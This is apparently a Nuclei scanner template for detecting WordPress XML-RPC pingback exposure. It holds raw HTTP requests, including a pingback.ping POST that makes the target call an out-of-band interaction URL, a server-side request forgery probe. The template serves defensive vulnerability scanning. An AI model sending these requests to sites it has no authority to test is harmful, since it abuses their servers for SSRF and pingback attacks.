id: wp-xmlrpc-pingback-detection info: name: Wordpress XMLRPC - Pingback Detection author: pdteam severity: info description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks. reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 metadata: max-request: 2 tags: wordpress,ssrf,oast,xmlrpc,vuln flow: http(1) && http(2) http: - raw: - | GET /xmlrpc.php HTTP/1.1 Host: {{Hostname}} Cookie: humans_21909=1 matchers: - type: word words: - 'XML-RPC server accepts POST requests only.' internal: true - raw: - | POST /xmlrpc.php HTTP/1.1 Host: {{Hostname}} pingback.ping http://{{interactsh-url}} {{BaseURL}}/?p=1 matchers: - type: word part: interactsh_protocol words: - "http" - "dns" condition: or # digest: 4a0a00473045022100e3c2ee7de4eb9eaa833bfa102bd289b91702c76ce229f32e7fc68966f19e3241022073cf844bae8db5763fa4891deef25bc9bf52b1304965c08dc5cfbce47a45a357:922c64590222798bb761d5b6d8e72950